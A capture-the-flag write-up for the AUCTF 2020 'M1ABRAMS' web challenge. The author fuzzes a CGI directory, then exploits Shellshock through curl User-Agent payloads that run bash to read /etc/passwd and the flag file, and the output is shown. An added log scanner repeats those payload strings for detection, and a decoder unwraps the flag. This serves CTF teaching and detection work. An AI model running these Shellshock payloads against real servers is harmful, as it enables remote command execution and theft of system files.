[ Home ] [ Writeups ] [ Articles ] [ Cheatsheets ] [ CVE ] [ EOF ]


.:: M1ABRAMS - AUCTF 2020 ::.
Title : M1ABRAMS - AUCTF 2020
Author : Cabir
Teammates : Deilyora, Worty
Date : Sunday, Apr 5, 2020
Modified : Sunday, Apr 5, 2020
Reading time: 1 minute and 57 seconds.

.: DESCRIPTION :.

We built up this server, and our security team seems pretty mad about it. See if you can find out why. Author: shinigami


-=[M1ABRAMS - AUCTF 2020]=-

Let's go to http://challenges.auctf.com:30024/

[screenshot]

From here I started fuzzing the URL with dirsearch.

[screenshot]

And I found two endpoints:

403  /cgi-bin/
403  /server-status

The /server-status endpoint is always present on Apache servers, and by default it is not reachable from the public (access is restricted to an IP whitelist). So I tried fuzzing /cgi-bin/ with the CGI-specific wordlists from SecLists (source: https://github.com/danielmiessler/SecLists.git), but nothing came up.

I inspected the headers on the / page and saw the server identify itself: Server: Apache/2.4.29 (Ubuntu)

Since I had nothing else, I started researching CVEs for this Apache version. Nothing looked interesting from a CTF point of view (mostly DoS), and the few exploits I tried didn't work. So I started over. I fuzzed the URL again with different wordlists, looking for special Apache folders. Nothing... I also fuzzed /cgi-bin/ again, this time with the big.txt wordlist from dirb.

[screenshot]

AND YES! We found something: /cgi-bin/scriptlet. If we go to this endpoint, we see:

[screenshot]

Sniff. Sniff. Smells like the Shellshock vulnerability. Read this if you don't know what Shellshock is: https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf

First I tried a simple payload:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://challenges.auctf.com:30025/cgi-bin/scriptlet

We have RCE:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
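Seen from the server side, the request above leaves a clear mark: the `() { :; };` function body sits in a header that Apache copies into the CGI environment, and in a combined-format access log it shows up verbatim in the User-Agent (or Referer) field. The following is an added Python example, not part of the original writeup or the challenge: it parses combined-format lines, flags any request whose header fields carry a Shellshock function body, and counts per-client 404s under /cgi-bin/ (the footprint the dirsearch/dirb fuzzing stage leaves). The log lines are constructed for the example, the addresses are documentation-range placeholders, and the function names are my own.

```python
import re
from collections import Counter

# Apache "combined" log format. The last two quoted fields are Referer and User-Agent;
# Apache writes embedded double quotes in them as \" so a quoted field is a run of
# plain characters or backslash-escaped characters.
_COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"\s*$'
)

# Shellshock trigger: a bash function definition "() { ... }" followed by a command
# list after the closing brace. What is captured as "tail" is what a vulnerable bash
# would have run when the CGI handler imported the header as an environment variable.
_SHELLSHOCK = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<tail>\S.*)')

# Constructed sample log (not from the challenge server). 203.0.113.5 and 198.51.100.7
# are documentation-range addresses; the request lines mirror the writeup's steps.
SAMPLE_LOG = """
198.51.100.7 - - [05/Apr/2020:13:58:02 +0000] "GET / HTTP/1.1" 200 10918 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/74.0"
203.0.113.5 - - [05/Apr/2020:14:01:09 +0000] "GET /cgi-bin/printenv HTTP/1.1" 404 275 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Apr/2020:14:01:10 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404 275 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Apr/2020:14:01:31 +0000] "GET /server-status HTTP/1.1" 403 277 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Apr/2020:14:02:48 +0000] "GET /cgi-bin/scriptlet HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Apr/2020:14:03:11 +0000] "GET /cgi-bin/scriptlet HTTP/1.1" 200 1337 "-" "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
203.0.113.5 - - [05/Apr/2020:14:03:40 +0000] "GET /cgi-bin/scriptlet HTTP/1.1" 200 44 "() { :; }; /bin/bash -c 'ls /'" "curl/7.68.0"
""".strip().splitlines()


def parse_combined(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = _COMBINED.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split()
    rec["method"] = parts[0] if parts else ""
    rec["path"] = parts[1] if len(parts) > 1 else ""
    return rec


def scan_access_log(lines):
    """Flag requests whose Referer or User-Agent carries a Shellshock function body."""
    findings = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue
        for field in ("referer", "ua"):
            m = _SHELLSHOCK.search(rec[field])
            if m:
                findings.append({
                    "ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                    "status": rec["status"], "field": field, "tail": m.group("tail"),
                })
    return findings


def cgi_probe_counts(lines):
    """Count 404s under /cgi-bin/ per client: the footprint of wordlist fuzzing."""
    counts = Counter()
    for line in lines:
        rec = parse_combined(line)
        if rec and rec["status"] == "404" and rec["path"].startswith("/cgi-bin/"):
            counts[rec["ip"]] += 1
    return dict(counts)


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print("%(ts)s %(ip)s %(path)s via %(field)s -> %(tail)s" % f)
    print("cgi-bin 404s per client:", cgi_probe_counts(SAMPLE_LOG))
```

Only the Referer and User-Agent reach the combined log; a payload sent in a custom header (Cookie, Accept, or any other one Apache exports as HTTP_*) would need a custom LogFormat or request-body logging to be visible this way, so the log check is a detection aid, not a substitute for patching bash.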

Now let's list the root directory:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'ls /'" http://challenges.auctf.com:30025/cgi-bin/scriptlet

We get:

bin boot dev etc flag.file home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

We can see flag.file in the root directory. Let's read it:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /flag.file'" http://challenges.auctf.com:30025/cgi-bin/scriptlet

1f8b0808de36755e0003666c61672e747874004b2c4d2e49ab56c93036348c0fce30f08ecf358eaf72484989ace502005a5da5461b000000

We get hexadecimal text. To copy it out without losing any bytes, we base64-encode it:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'base64 /flag.file'" http://challenges.auctf.com:30025/cgi-bin/scriptlet

MWY4YjA4MDhkZTM2NzU1ZTAwMDM2NjZjNjE2NzJlNzQ3ODc0MDA0YjJjNGQyZTQ5YWI1NmM5MzAz
NjM0CjhjMGZjZTMwZjA4ZWNmMzU4ZWFmNzI0ODQ5ODlhY2U1MDIwMDVhNWRhNTQ2MWIwMDAwMDAK

I copy/pasted the base64 output into a file named flag.file on my machine, then decoded it in reverse (base64 first, then the hex text back to raw bytes with xxd -r -p) and redirected the result into file.txt:

cat flag.file | base64 -d | xxd -r -p > file.txt

file file.txt
file.txt: gzip compressed data, was "flag.txt", last modified: Fri Mar 20 21:34:22 2020, from Unix, original size 27

OK, we have a gzip file. Let's try to decompress it:

gzip -d file.txt
gzip: file.txt: unknown suffix -- ignored

Shit. Wrong file suffix.

mv file.txt file.gz
gzip -d file.gz
cat file
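The same recovery chain (base64 text, then hex text, then a gzip member) done in one place, as an added Python example that is not part of the original writeup: it parses the gzip header by hand, which is exactly what `file` was reading to report `was "flag.txt"` and the modification time, then inflates the body as a raw deflate stream and checks the CRC and length in the trailer. The base64 input is a copy of the value shown above; the function names are my own.

```python
import base64
import struct
import zlib

# Copy of the base64 text the server returned for /flag.file (two wrapped lines).
# Note that it decodes to ASCII hex text, not to the raw bytes of the file.
B64_FROM_SERVER = (
    "MWY4YjA4MDhkZTM2NzU1ZTAwMDM2NjZjNjE2NzJlNzQ3ODc0MDA0YjJjNGQyZTQ5YWI1NmM5MzAz\n"
    "NjM0CjhjMGZjZTMwZjA4ZWNmMzU4ZWFmNzI0ODQ5ODlhY2U1MDIwMDVhNWRhNTQ2MWIwMDAwMDAK\n"
)

# gzip header flag bits (RFC 1952).
FTEXT, FHCRC, FEXTRA, FNAME, FCOMMENT = 0x01, 0x02, 0x04, 0x08, 0x10


def unwrap_hex_text(b64_text):
    """base64 -> hex text -> raw bytes, ignoring the line wrapping of both layers."""
    hex_text = base64.b64decode("".join(b64_text.split())).decode("ascii")
    return bytes.fromhex("".join(hex_text.split()))


def parse_gzip_member(raw):
    """Parse one gzip member (RFC 1952 layout) and inflate its payload."""
    if raw[:2] != b"\x1f\x8b":
        raise ValueError("not gzip: bad magic")
    # CM, FLG, MTIME (unix seconds, little-endian), XFL, OS
    method, flags, mtime, _xfl, os_id = struct.unpack("<BBIBB", raw[2:10])
    if method != 8:
        raise ValueError("unsupported compression method %d" % method)
    pos = 10
    if flags & FEXTRA:
        (xlen,) = struct.unpack("<H", raw[pos:pos + 2])
        pos += 2 + xlen
    name = comment = None
    if flags & FNAME:                       # NUL-terminated original file name
        end = raw.index(b"\x00", pos)
        name = raw[pos:end].decode("latin-1")
        pos = end + 1
    if flags & FCOMMENT:
        end = raw.index(b"\x00", pos)
        comment = raw[pos:end].decode("latin-1")
        pos = end + 1
    if flags & FHCRC:
        pos += 2
    # Raw deflate body: zlib stops at the final block and hands back the trailer.
    inflater = zlib.decompressobj(-zlib.MAX_WBITS)
    data = inflater.decompress(raw[pos:]) + inflater.flush()
    trailer = inflater.unused_data
    if len(trailer) < 8:
        raise ValueError("truncated gzip trailer")
    crc32, isize = struct.unpack("<II", trailer[:8])
    return {
        "name": name, "comment": comment, "mtime": mtime, "os": os_id,
        "data": data,
        "crc_ok": (zlib.crc32(data) & 0xFFFFFFFF) == crc32,
        "size_ok": (len(data) & 0xFFFFFFFF) == isize,
    }


def recover_flag_file(b64_text=B64_FROM_SERVER):
    """Full chain: server base64 -> hex -> gzip member -> original content."""
    return parse_gzip_member(unwrap_hex_text(b64_text))


if __name__ == "__main__":
    info = recover_flag_file()
    print("original name:", info["name"], "mtime:", info["mtime"],
          "crc ok:", info["crc_ok"], "size ok:", info["size_ok"])
    print(info["data"].decode())
```

Parsing the member by hand rather than calling gzip.decompress makes the two things the writeup stumbled on visible: the original name lives in the header (so the .txt extension was never part of the data, only of the wrapper), and gzip itself never looks at the suffix once it is handed a stream, which is why renaming to .gz was all that was needed.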

.: FLAG :.

auctf{$h311_Sh0K_m3_z@ddY}
